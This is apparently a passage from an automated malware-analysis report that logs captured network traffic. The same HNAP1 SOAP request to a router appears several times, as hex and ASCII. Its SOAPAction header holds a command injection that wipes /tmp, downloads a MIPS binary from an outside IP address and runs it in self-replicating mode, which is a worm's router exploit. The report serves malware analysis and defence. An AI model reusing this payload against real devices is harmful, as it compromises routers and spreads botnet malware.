42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
